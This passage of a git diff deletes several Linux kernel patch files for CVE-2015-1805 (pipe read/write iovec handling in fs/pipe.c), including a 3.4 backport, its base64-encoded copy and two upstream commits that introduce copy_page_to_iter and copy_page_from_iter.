--			buf->offset += chars;
- 			buf->len -= chars;
- 
- 			/* Was it a packet buffer? Clean up and exit */
-@@ -522,6 +527,7 @@ pipe_write(struct kiocb *iocb, const struct iovec *_iov,
- 		if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- 			int error, atomic = 1;
- 			void *addr;
-+			size_t remaining = chars;
- 
- 			error = ops->confirm(pipe, buf);
- 			if (error)
-@@ -530,8 +536,8 @@ pipe_write(struct kiocb *iocb, const struct iovec *_iov,
- 			iov_fault_in_pages_read(iov, chars);
- redo1:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_from_user(offset + addr, iov,
--							chars, atomic);
-+			error = pipe_iov_copy_from_user(addr, &offset, iov,
-+							&remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			ret = error;
- 			do_wakeup = 1;
-@@ -566,6 +572,8 @@ redo1:
- 			struct page *page = pipe->tmp_page;
- 			char *src;
- 			int error, atomic = 1;
-+			int offset = 0;
-+			size_t remaining;
- 
- 			if (!page) {
- 				page = alloc_page(GFP_HIGHUSER);
-@@ -586,14 +594,15 @@ redo1:
- 				chars = total_len;
- 
- 			iov_fault_in_pages_read(iov, chars);
-+			remaining = chars;
- redo2:
- 			if (atomic)
- 				src = kmap_atomic(page);
- 			else
- 				src = kmap(page);
- 
--			error = pipe_iov_copy_from_user(src, iov, chars,
--							atomic);
-+			error = pipe_iov_copy_from_user(src, &offset, iov,
-+							&remaining, atomic);
- 			if (atomic)
- 				kunmap_atomic(src);
- 			else
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch
deleted file mode 100644
index ec40d3ec..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch
+++ /dev/null
@@ -1,152 +0,0 @@
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 125f32f..a6321e0 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -104,25 +104,27 @@
- }
- 
- static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
--			int atomic)
-+pipe_iov_copy_from_user(void *addr, int *offset, struct iovec *iov,
-+			size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_from_user_inatomic(to, iov->iov_base, copy))
-+			if (__copy_from_user_inatomic(addr + *offset,
-+						      iov->iov_base, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_from_user(to, iov->iov_base, copy))
-+			if (copy_from_user(addr + *offset,
-+					   iov->iov_base, copy))
- 				return -EFAULT;
- 		}
--		to += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -130,25 +132,27 @@
- }
- 
- static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
--		      int atomic)
-+pipe_iov_copy_to_user(struct iovec *iov, void *addr, int *offset,
-+		      size_t *remaining, int atomic)
- {
- 	unsigned long copy;
- 
--	while (len > 0) {
-+	while (*remaining > 0) {
- 		while (!iov->iov_len)
- 			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
-+		copy = min_t(unsigned long, *remaining, iov->iov_len);
- 
- 		if (atomic) {
--			if (__copy_to_user_inatomic(iov->iov_base, from, copy))
-+			if (__copy_to_user_inatomic(iov->iov_base,
-+						    addr + *offset, copy))
- 				return -EFAULT;
- 		} else {
--			if (copy_to_user(iov->iov_base, from, copy))
-+			if (copy_to_user(iov->iov_base,
-+					 addr + *offset, copy))
- 				return -EFAULT;
- 		}
--		from += copy;
--		len -= copy;
-+		*offset += copy;
-+		*remaining -= copy;
- 		iov->iov_base += copy;
- 		iov->iov_len -= copy;
- 	}
-@@ -384,7 +388,7 @@
- 			struct pipe_buffer *buf = pipe->bufs + curbuf;
- 			const struct pipe_buf_operations *ops = buf->ops;
- 			void *addr;
--			size_t chars = buf->len;
-+			size_t chars = buf->len, remaining;
- 			int error, atomic;
- 
- 			if (chars > total_len)
-@@ -398,9 +402,11 @@
- 			}
- 
- 			atomic = !iov_fault_in_pages_write(iov, chars);
-+			remaining = chars;
- redo:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
-+			error = pipe_iov_copy_to_user(iov, addr, &buf->offset,
-+						      &remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			if (unlikely(error)) {
- 				/*
-@@ -415,7 +421,6 @@
- 				break;
- 			}
- 			ret += chars;
--			buf->offset += chars;
- 			buf->len -= chars;
- 
- 			/* Was it a packet buffer? Clean up and exit */
-@@ -522,6 +527,7 @@
- 		if (ops->can_merge && offset + chars <= PAGE_SIZE) {
- 			int error, atomic = 1;
- 			void *addr;
-+			size_t remaining = chars;
- 
- 			error = ops->confirm(pipe, buf);
- 			if (error)
-@@ -530,8 +536,8 @@
- 			iov_fault_in_pages_read(iov, chars);
- redo1:
- 			addr = ops->map(pipe, buf, atomic);
--			error = pipe_iov_copy_from_user(offset + addr, iov,
--							chars, atomic);
-+			error = pipe_iov_copy_from_user(addr, &offset, iov,
-+							&remaining, atomic);
- 			ops->unmap(pipe, buf, addr);
- 			ret = error;
- 			do_wakeup = 1;
-@@ -566,6 +572,8 @@
- 			struct page *page = pipe->tmp_page;
- 			char *src;
- 			int error, atomic = 1;
-+			int offset = 0;
-+			size_t remaining;
- 
- 			if (!page) {
- 				page = alloc_page(GFP_HIGHUSER);
-@@ -586,14 +594,15 @@
- 				chars = total_len;
- 
- 			iov_fault_in_pages_read(iov, chars);
-+			remaining = chars;
- redo2:
- 			if (atomic)
- 				src = kmap_atomic(page);
- 			else
- 				src = kmap(page);
- 
--			error = pipe_iov_copy_from_user(src, iov, chars,
--							atomic);
-+			error = pipe_iov_copy_from_user(src, &offset, iov,
-+							&remaining, atomic);
- 			if (atomic)
- 				kunmap_atomic(src);
- 			else
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch.base64
deleted file mode 100644
index c27350af..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2ZzL3BpcGUuYyBiL2ZzL3BpcGUuYwppbmRleCAxMjVmMzJmLi5hNjMyMWUwIDEwMDY0NAotLS0gYS9mcy9waXBlLmMKKysrIGIvZnMvcGlwZS5jCkBAIC0xMDQsMjUgKzEwNCwyNyBAQAogfQogCiBzdGF0aWMgaW50Ci1waXBlX2lvdl9jb3B5X2Zyb21fdXNlcih2b2lkICp0bywgc3RydWN0IGlvdmVjICppb3YsIHVuc2lnbmVkIGxvbmcgbGVuLAotCQkJaW50IGF0b21pYykKK3BpcGVfaW92X2NvcHlfZnJvbV91c2VyKHZvaWQgKmFkZHIsIGludCAqb2Zmc2V0LCBzdHJ1Y3QgaW92ZWMgKmlvdiwKKwkJCXNpemVfdCAqcmVtYWluaW5nLCBpbnQgYXRvbWljKQogewogCXVuc2lnbmVkIGxvbmcgY29weTsKIAotCXdoaWxlIChsZW4gPiAwKSB7CisJd2hpbGUgKCpyZW1haW5pbmcgPiAwKSB7CiAJCXdoaWxlICghaW92LT5pb3ZfbGVuKQogCQkJaW92Kys7Ci0JCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCBsZW4sIGlvdi0+aW92X2xlbik7CisJCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCAqcmVtYWluaW5nLCBpb3YtPmlvdl9sZW4pOwogCiAJCWlmIChhdG9taWMpIHsKLQkJCWlmIChfX2NvcHlfZnJvbV91c2VyX2luYXRvbWljKHRvLCBpb3YtPmlvdl9iYXNlLCBjb3B5KSkKKwkJCWlmIChfX2NvcHlfZnJvbV91c2VyX2luYXRvbWljKGFkZHIgKyAqb2Zmc2V0LAorCQkJCQkJICAgICAgaW92LT5pb3ZfYmFzZSwgY29weSkpCiAJCQkJcmV0dXJuIC1FRkFVTFQ7CiAJCX0gZWxzZSB7Ci0JCQlpZiAoY29weV9mcm9tX3VzZXIodG8sIGlvdi0+aW92X2Jhc2UsIGNvcHkpKQorCQkJaWYgKGNvcHlfZnJvbV91c2VyKGFkZHIgKyAqb2Zmc2V0LAorCQkJCQkgICBpb3YtPmlvdl9iYXNlLCBjb3B5KSkKIAkJCQlyZXR1cm4gLUVGQVVMVDsKIAkJfQotCQl0byArPSBjb3B5OwotCQlsZW4gLT0gY29weTsKKwkJKm9mZnNldCArPSBjb3B5OworCQkqcmVtYWluaW5nIC09IGNvcHk7CiAJCWlvdi0+aW92X2Jhc2UgKz0gY29weTsKIAkJaW92LT5pb3ZfbGVuIC09IGNvcHk7CiAJfQpAQCAtMTMwLDI1ICsxMzIsMjcgQEAKIH0KIAogc3RhdGljIGludAotcGlwZV9pb3ZfY29weV90b191c2VyKHN0cnVjdCBpb3ZlYyAqaW92LCBjb25zdCB2b2lkICpmcm9tLCB1bnNpZ25lZCBsb25nIGxlbiwKLQkJICAgICAgaW50IGF0b21pYykKK3BpcGVfaW92X2NvcHlfdG9fdXNlcihzdHJ1Y3QgaW92ZWMgKmlvdiwgdm9pZCAqYWRkciwgaW50ICpvZmZzZXQsCisJCSAgICAgIHNpemVfdCAqcmVtYWluaW5nLCBpbnQgYXRvbWljKQogewogCXVuc2lnbmVkIGxvbmcgY29weTsKIAotCXdoaWxlIChsZW4gPiAwKSB7CisJd2hpbGUgKCpyZW1haW5pbmcgPiAwKSB7CiAJCXdoaWxlICghaW92LT5pb3ZfbGVuKQogCQkJaW92Kys7Ci0JCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCBsZW4sIGlvdi0+aW92X2xlbik7CisJCWNvcHkgPSBtaW5fdCh1bnNpZ25lZCBsb25nLCAqcmVtYWluaW5nLCBpb3YtPmlvdl9sZW4pOwogCiAJCWlmIChhdG9taWMpIHsKLQkJCWlmIChfX2NvcHlfdG9fdXNlcl9pbmF0b21pYyhpb3YtPmlvdl9iYXNlLCBmcm9tLCBjb3B5KSkKKwkJCWlmIChfX2NvcHlfdG9fdXNlcl9pbmF0b21pYyhpb3YtPmlvdl9iYXNlLAorCQkJCQkJICAgIGFkZHIgKyAqb2Zmc2V0LCBjb3B5KSkKIAkJCQlyZXR1cm4gLUVGQVVMVDsKIAkJfSBlbHNlIHsKLQkJCWlmIChjb3B5X3RvX3VzZXIoaW92LT5pb3ZfYmFzZSwgZnJvbSwgY29weSkpCisJCQlpZiAoY29weV90b191c2VyKGlvdi0+aW92X2Jhc2UsCisJCQkJCSBhZGRyICsgKm9mZnNldCwgY29weSkpCiAJCQkJcmV0dXJuIC1FRkFVTFQ7CiAJCX0KLQkJZnJvbSArPSBjb3B5OwotCQlsZW4gLT0gY29weTsKKwkJKm9mZnNldCArPSBjb3B5OworCQkqcmVtYWluaW5nIC09IGNvcHk7CiAJCWlvdi0+aW92X2Jhc2UgKz0gY29weTsKIAkJaW92LT5pb3ZfbGVuIC09IGNvcHk7CiAJfQpAQCAtMzg0LDcgKzM4OCw3IEBACiAJCQlzdHJ1Y3QgcGlwZV9idWZmZXIgKmJ1ZiA9IHBpcGUtPmJ1ZnMgKyBjdXJidWY7CiAJCQljb25zdCBzdHJ1Y3QgcGlwZV9idWZfb3BlcmF0aW9ucyAqb3BzID0gYnVmLT5vcHM7CiAJCQl2b2lkICphZGRyOwotCQkJc2l6ZV90IGNoYXJzID0gYnVmLT5sZW47CisJCQlzaXplX3QgY2hhcnMgPSBidWYtPmxlbiwgcmVtYWluaW5nOwogCQkJaW50IGVycm9yLCBhdG9taWM7CiAKIAkJCWlmIChjaGFycyA+IHRvdGFsX2xlbikKQEAgLTM5OCw5ICs0MDIsMTEgQEAKIAkJCX0KIAogCQkJYXRvbWljID0gIWlvdl9mYXVsdF9pbl9wYWdlc193cml0ZShpb3YsIGNoYXJzKTsKKwkJCXJlbWFpbmluZyA9IGNoYXJzOwogcmVkbzoKIAkJCWFkZHIgPSBvcHMtPm1hcChwaXBlLCBidWYsIGF0b21pYyk7Ci0JCQllcnJvciA9IHBpcGVfaW92X2NvcHlfdG9fdXNlcihpb3YsIGFkZHIgKyBidWYtPm9mZnNldCwgY2hhcnMsIGF0b21pYyk7CisJCQllcnJvciA9IHBpcGVfaW92X2NvcHlfdG9fdXNlcihpb3YsIGFkZHIsICZidWYtPm9mZnNldCwKKwkJCQkJCSAgICAgICZyZW1haW5pbmcsIGF0b21pYyk7CiAJCQlvcHMtPnVubWFwKHBpcGUsIGJ1ZiwgYWRkcik7CiAJCQlpZiAodW5saWtlbHkoZXJyb3IpKSB7CiAJCQkJLyoKQEAgLTQxNSw3ICs0MjEsNiBAQAogCQkJCWJyZWFrOwogCQkJfQogCQkJcmV0ICs9IGNoYXJzOwotCQkJYnVmLT5vZmZzZXQgKz0gY2hhcnM7CiAJCQlidWYtPmxlbiAtPSBjaGFyczsKIAogCQkJLyogV2FzIGl0IGEgcGFja2V0IGJ1ZmZlcj8gQ2xlYW4gdXAgYW5kIGV4aXQgKi8KQEAgLTUyMiw2ICs1MjcsNyBAQAogCQlpZiAob3BzLT5jYW5fbWVyZ2UgJiYgb2Zmc2V0ICsgY2hhcnMgPD0gUEFHRV9TSVpFKSB7CiAJCQlpbnQgZXJyb3IsIGF0b21pYyA9IDE7CiAJCQl2b2lkICphZGRyOworCQkJc2l6ZV90IHJlbWFpbmluZyA9IGNoYXJzOwogCiAJCQllcnJvciA9IG9wcy0+Y29uZmlybShwaXBlLCBidWYpOwogCQkJaWYgKGVycm9yKQpAQCAtNTMwLDggKzUzNiw4IEBACiAJCQlpb3ZfZmF1bHRfaW5fcGFnZXNfcmVhZChpb3YsIGNoYXJzKTsKIHJlZG8xOgogCQkJYWRkciA9IG9wcy0+bWFwKHBpcGUsIGJ1ZiwgYXRvbWljKTsKLQkJCWVycm9yID0gcGlwZV9pb3ZfY29weV9mcm9tX3VzZXIob2Zmc2V0ICsgYWRkciwgaW92LAotCQkJCQkJCWNoYXJzLCBhdG9taWMpOworCQkJZXJyb3IgPSBwaXBlX2lvdl9jb3B5X2Zyb21fdXNlcihhZGRyLCAmb2Zmc2V0LCBpb3YsCisJCQkJCQkJJnJlbWFpbmluZywgYXRvbWljKTsKIAkJCW9wcy0+dW5tYXAocGlwZSwgYnVmLCBhZGRyKTsKIAkJCXJldCA9IGVycm9yOwogCQkJZG9fd2FrZXVwID0gMTsKQEAgLTU2Niw2ICs1NzIsOCBAQAogCQkJc3RydWN0IHBhZ2UgKnBhZ2UgPSBwaXBlLT50bXBfcGFnZTsKIAkJCWNoYXIgKnNyYzsKIAkJCWludCBlcnJvciwgYXRvbWljID0gMTsKKwkJCWludCBvZmZzZXQgPSAwOworCQkJc2l6ZV90IHJlbWFpbmluZzsKIAogCQkJaWYgKCFwYWdlKSB7CiAJCQkJcGFnZSA9IGFsbG9jX3BhZ2UoR0ZQX0hJR0hVU0VSKTsKQEAgLTU4NiwxNCArNTk0LDE1IEBACiAJCQkJY2hhcnMgPSB0b3RhbF9sZW47CiAKIAkJCWlvdl9mYXVsdF9pbl9wYWdlc19yZWFkKGlvdiwgY2hhcnMpOworCQkJcmVtYWluaW5nID0gY2hhcnM7CiByZWRvMjoKIAkJCWlmIChhdG9taWMpCiAJCQkJc3JjID0ga21hcF9hdG9taWMocGFnZSk7CiAJCQllbHNlCiAJCQkJc3JjID0ga21hcChwYWdlKTsKIAotCQkJZXJyb3IgPSBwaXBlX2lvdl9jb3B5X2Zyb21fdXNlcihzcmMsIGlvdiwgY2hhcnMsCi0JCQkJCQkJYXRvbWljKTsKKwkJCWVycm9yID0gcGlwZV9pb3ZfY29weV9mcm9tX3VzZXIoc3JjLCAmb2Zmc2V0LCBpb3YsCisJCQkJCQkJJnJlbWFpbmluZywgYXRvbWljKTsKIAkJCWlmIChhdG9taWMpCiAJCQkJa3VubWFwX2F0b21pYyhzcmMpOwogCQkJZWxzZQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2015-1805/ANY/0005.patch
deleted file mode 100644
index 02c24662..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0005.patch
+++ /dev/null
@@ -1,132 +0,0 @@
-From 637b58c2887e5e57850865839cc75f59184b23d1 Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Mon, 3 Feb 2014 19:11:42 -0500
-Subject: switch pipe_read() to copy_page_to_iter()
-
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- fs/pipe.c | 79 +++++++--------------------------------------------------------
- 1 file changed, 8 insertions(+), 71 deletions(-)
-
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 6679c95..034bffa 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -142,55 +142,6 @@ pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
- 	return 0;
- }
- 
--static int
--pipe_iov_copy_to_user(struct iovec *iov, const void *from, unsigned long len,
--		      int atomic)
--{
--	unsigned long copy;
--
--	while (len > 0) {
--		while (!iov->iov_len)
--			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
--
--		if (atomic) {
--			if (__copy_to_user_inatomic(iov->iov_base, from, copy))
--				return -EFAULT;
--		} else {
--			if (copy_to_user(iov->iov_base, from, copy))
--				return -EFAULT;
--		}
--		from += copy;
--		len -= copy;
--		iov->iov_base += copy;
--		iov->iov_len -= copy;
--	}
--	return 0;
--}
--
--/*
-- * Attempt to pre-fault in the user memory, so we can use atomic copies.
-- * Returns the number of bytes not faulted in.
-- */
--static int iov_fault_in_pages_write(struct iovec *iov, unsigned long len)
--{
--	while (!iov->iov_len)
--		iov++;
--
--	while (len > 0) {
--		unsigned long this_len;
--
--		this_len = min_t(unsigned long, len, iov->iov_len);
--		if (fault_in_pages_writeable(iov->iov_base, this_len))
--			break;
--
--		len -= this_len;
--		iov++;
--	}
--
--	return len;
--}
--
- /*
-  * Pre-fault in the user memory, so we can use atomic copies.
-  */
-@@ -329,12 +280,15 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 	ssize_t ret;
- 	struct iovec *iov = (struct iovec *)_iov;
- 	size_t total_len;
-+	struct iov_iter iter;
- 
- 	total_len = iov_length(iov, nr_segs);
- 	/* Null read succeeds. */
- 	if (unlikely(total_len == 0))
- 		return 0;
- 
-+	iov_iter_init(&iter, iov, nr_segs, total_len, 0);
-+
- 	do_wakeup = 0;
- 	ret = 0;
- 	__pipe_lock(pipe);
-@@ -344,9 +298,9 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 			int curbuf = pipe->curbuf;
- 			struct pipe_buffer *buf = pipe->bufs + curbuf;
- 			const struct pipe_buf_operations *ops = buf->ops;
--			void *addr;
- 			size_t chars = buf->len;
--			int error, atomic;
-+			size_t written;
-+			int error;
- 
- 			if (chars > total_len)
- 				chars = total_len;
-@@ -358,27 +312,10 @@ pipe_read(struct kiocb *iocb, const struct iovec *_iov,
- 				break;
- 			}
- 
--			atomic = !iov_fault_in_pages_write(iov, chars);
--redo:
--			if (atomic)
--				addr = kmap_atomic(buf->page);
--			else
--				addr = kmap(buf->page);
--			error = pipe_iov_copy_to_user(iov, addr + buf->offset, chars, atomic);
--			if (atomic)
--				kunmap_atomic(addr);
--			else
--				kunmap(buf->page);
--			if (unlikely(error)) {
--				/*
--				 * Just retry with the slow path if we failed.
--				 */
--				if (atomic) {
--					atomic = 0;
--					goto redo;
--				}
-+			written = copy_page_to_iter(buf->page, buf->offset, chars, &iter);
-+			if (unlikely(written < chars)) {
- 				if (!ret)
--					ret = error;
-+					ret = -EFAULT;
- 				break;
- 			}
- 			ret += chars;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2015-1805/ANY/0006.patch
deleted file mode 100644
index 17af5dbc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-1805/ANY/0006.patch
+++ /dev/null
@@ -1,326 +0,0 @@
-From f0d1bec9d58d4c038d0ac958c9af82be6eb18045 Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Thu, 3 Apr 2014 15:05:18 -0400
-Subject: new helper: copy_page_from_iter()
-
-parallel to copy_page_to_iter().  pipe_write() switched to it (and became
-->write_iter()).
-
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- fs/pipe.c           | 129 ++++++++--------------------------------------------
- include/linux/uio.h |   2 +
- mm/iov_iter.c       |  78 +++++++++++++++++++++++++++++++
- 3 files changed, 99 insertions(+), 110 deletions(-)
-
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 05ccb00..21981e5 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -116,50 +116,6 @@ void pipe_wait(struct pipe_inode_info *pipe)
- 	pipe_lock(pipe);
- }
- 
--static int
--pipe_iov_copy_from_user(void *to, struct iovec *iov, unsigned long len,
--			int atomic)
--{
--	unsigned long copy;
--
--	while (len > 0) {
--		while (!iov->iov_len)
--			iov++;
--		copy = min_t(unsigned long, len, iov->iov_len);
--
--		if (atomic) {
--			if (__copy_from_user_inatomic(to, iov->iov_base, copy))
--				return -EFAULT;
--		} else {
--			if (copy_from_user(to, iov->iov_base, copy))
--				return -EFAULT;
--		}
--		to += copy;
--		len -= copy;
--		iov->iov_base += copy;
--		iov->iov_len -= copy;
--	}
--	return 0;
--}
--
--/*
-- * Pre-fault in the user memory, so we can use atomic copies.
-- */
--static void iov_fault_in_pages_read(struct iovec *iov, unsigned long len)
--{
--	while (!iov->iov_len)
--		iov++;
--
--	while (len > 0) {
--		unsigned long this_len;
--
--		this_len = min_t(unsigned long, len, iov->iov_len);
--		fault_in_pages_readable(iov->iov_base, this_len);
--		len -= this_len;
--		iov++;
--	}
--}
--
- static void anon_pipe_buf_release(struct pipe_inode_info *pipe,
- 				  struct pipe_buffer *buf)
- {
-@@ -380,24 +336,19 @@ static inline int is_packetized(struct file *file)
- }
- 
- static ssize_t
--pipe_write(struct kiocb *iocb, const struct iovec *_iov,
--	    unsigned long nr_segs, loff_t ppos)
-+pipe_write(struct kiocb *iocb, struct iov_iter *from)
- {
- 	struct file *filp = iocb->ki_filp;
- 	struct pipe_inode_info *pipe = filp->private_data;
--	ssize_t ret;
--	int do_wakeup;
--	struct iovec *iov = (struct iovec *)_iov;
--	size_t total_len;
-+	ssize_t ret = 0;
-+	int do_wakeup = 0;
-+	size_t total_len = iov_iter_count(from);
- 	ssize_t chars;
- 
--	total_len = iov_length(iov, nr_segs);
- 	/* Null write succeeds. */
- 	if (unlikely(total_len == 0))
- 		return 0;
- 
--	do_wakeup = 0;
--	ret = 0;
- 	__pipe_lock(pipe);
- 
- 	if (!pipe->readers) {
-@@ -416,38 +367,19 @@ pipe_write(struct kiocb *iocb, const struct iovec *_iov,
- 		int offset = buf->offset + buf->len;
- 
- 		if (ops->can_merge && offset + chars <= PAGE_SIZE) {
--			int error, atomic = 1;
--			void *addr;
--
--			error = ops->confirm(pipe, buf);
-+			int error = ops->confirm(pipe, buf);
- 			if (error)
- 				goto out;
- 
--			iov_fault_in_pages_read(iov, chars);
--redo1:
--			if (atomic)
--				addr = kmap_atomic(buf->page);
--			else
--				addr = kmap(buf->page);
--			error = pipe_iov_copy_from_user(offset + addr, iov,
--							chars, atomic);
--			if (atomic)
--				kunmap_atomic(addr);
--			else
--				kunmap(buf->page);
--			ret = error;
--			do_wakeup = 1;
--			if (error) {
--				if (atomic) {
--					atomic = 0;
--					goto redo1;
--				}
-+			ret = copy_page_from_iter(buf->page, offset, chars, from);
-+			if (unlikely(ret < chars)) {
-+				error = -EFAULT;
- 				goto out;
- 			}
-+			do_wakeup = 1;
- 			buf->len += chars;
--			total_len -= chars;
- 			ret = chars;
--			if (!total_len)
-+			if (!iov_iter_count(from))
- 				goto out;
- 		}
- 	}
-@@ -466,8 +398,7 @@ redo1:
- 			int newbuf = (pipe->curbuf + bufs) & (pipe->buffers-1);
- 			struct pipe_buffer *buf = pipe->bufs + newbuf;
- 			struct page *page = pipe->tmp_page;
--			char *src;
--			int error, atomic = 1;
-+			int copied;
- 
- 			if (!page) {
- 				page = alloc_page(GFP_HIGHUSER);
-@@ -483,40 +414,19 @@ redo1:
- 			 * FIXME! Is this really true?
- 			 */
- 			do_wakeup = 1;
--			chars = PAGE_SIZE;
--			if (chars > total_len)
--				chars = total_len;
--
--			iov_fault_in_pages_read(iov, chars);
--redo2:
--			if (atomic)
--				src = kmap_atomic(page);
--			else
--				src = kmap(page);
--
--			error = pipe_iov_copy_from_user(src, iov, chars,
--							atomic);
--			if (atomic)
--				kunmap_atomic(src);
--			else
--				kunmap(page);
--
--			if (unlikely(error)) {
--				if (atomic) {
--					atomic = 0;
--					goto redo2;
--				}
-+			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
-+			if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
- 				if (!ret)
--					ret = error;
-+					ret = -EFAULT;
- 				break;
- 			}
--			ret += chars;
-+			ret += copied;
- 
- 			/* Insert it into the buffer array */
- 			buf->page = page;
- 			buf->ops = &anon_pipe_buf_ops;
- 			buf->offset = 0;
--			buf->len = chars;
-+			buf->len = copied;
- 			buf->flags = 0;
- 			if (is_packetized(filp)) {
- 				buf->ops = &packet_pipe_buf_ops;
-@@ -525,8 +435,7 @@ redo2:
- 			pipe->nrbufs = ++bufs;
- 			pipe->tmp_page = NULL;
- 
--			total_len -= chars;
--			if (!total_len)
-+			if (!iov_iter_count(from))
- 				break;
- 		}
- 		if (bufs < pipe->buffers)
-@@ -1040,8 +949,8 @@ const struct file_operations pipefifo_fops = {
- 	.llseek		= no_llseek,
- 	.read		= new_sync_read,
- 	.read_iter	= pipe_read,
--	.write		= do_sync_write,
--	.aio_write	= pipe_write,
-+	.write		= new_sync_write,
-+	.write_iter	= pipe_write,
- 	.poll		= pipe_poll,
- 	.unlocked_ioctl	= pipe_ioctl,
- 	.release	= pipe_release,
-diff --git a/include/linux/uio.h b/include/linux/uio.h
-index 532f59d..6601235 100644
---- a/include/linux/uio.h
-+++ b/include/linux/uio.h
-@@ -68,6 +68,8 @@ int iov_iter_fault_in_readable(struct iov_iter *i, size_t bytes);
- size_t iov_iter_single_seg_count(const struct iov_iter *i);
- size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes,
- 			 struct iov_iter *i);
-+size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes,
-+			 struct iov_iter *i);
- unsigned long iov_iter_alignment(const struct iov_iter *i);
- void iov_iter_init(struct iov_iter *i, int direction, const struct iovec *iov,
- 			unsigned long nr_segs, size_t count);
-diff --git a/mm/iov_iter.c b/mm/iov_iter.c
-index a5c691c..081e327 100644
---- a/mm/iov_iter.c
-+++ b/mm/iov_iter.c
-@@ -82,6 +82,84 @@ done:
- }
- EXPORT_SYMBOL(copy_page_to_iter);
- 
-+size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes,
-+			 struct iov_iter *i)
-+{
-+	size_t skip, copy, left, wanted;
-+	const struct iovec *iov;
-+	char __user *buf;
-+	void *kaddr, *to;
-+
-+	if (unlikely(bytes > i->count))
-+		bytes = i->count;
-+
-+	if (unlikely(!bytes))
-+		return 0;
-+
-+	wanted = bytes;
-+	iov = i->iov;
-+	skip = i->iov_offset;
-+	buf = iov->iov_base + skip;
-+	copy = min(bytes, iov->iov_len - skip);
-+
-+	if (!fault_in_pages_readable(buf, copy)) {
-+		kaddr = kmap_atomic(page);
-+		to = kaddr + offset;
-+
-+		/* first chunk, usually the only one */
-+		left = __copy_from_user_inatomic(to, buf, copy);
-+		copy -= left;
-+		skip += copy;
-+		to += copy;
-+		bytes -= copy;
-+
-+		while (unlikely(!left && bytes)) {
-+			iov++;
-+			buf = iov->iov_base;
-+			copy = min(bytes, iov->iov_len);
-+			left = __copy_from_user_inatomic(to, buf, copy);
-+			copy -= left;
-+			skip = copy;
-+			to += copy;
-+			bytes -= copy;
-+		}
-+		if (likely(!bytes)) {
-+			kunmap_atomic(kaddr);
-+			goto done;
-+		}
-+		offset = to - kaddr;
-+		buf += copy;
-+		kunmap_atomic(kaddr);
-+		copy = min(bytes, iov->iov_len - skip);
-+	}
-+	/* Too bad - revert to non-atomic kmap */
-+	kaddr = kmap(page);
-+	to = kaddr + offset;
-+	left = __copy_from_user(to, buf, copy);
-+	copy -= left;
-+	skip += copy;
-+	to += copy;
-+	bytes -= copy;
-+	while (unlikely(!left && bytes)) {
-+		iov++;
-+		buf = iov->iov_base;
-+		copy = min(bytes, iov->iov_len);
-+		left = __copy_from_user(to, buf, copy);
-+		copy -= left;
-+		skip = copy;
-+		to += copy;
-+		bytes -= copy;
-+	}
-+	kunmap(page);
-+done:
-+	i->count -= wanted - bytes;
-+	i->nr_segs -= iov - i->iov;
-+	i->iov = iov;
-+	i->iov_offset = skip;
-+	return wanted - bytes;
-+}
-+EXPORT_SYMBOL(copy_page_from_iter);
-+
- static size_t __iovec_copy_from_user_inatomic(char *vaddr,
- 			const struct iovec *iov, size_t base, size_t bytes)
- {
--- 
-cgit v1.1
-
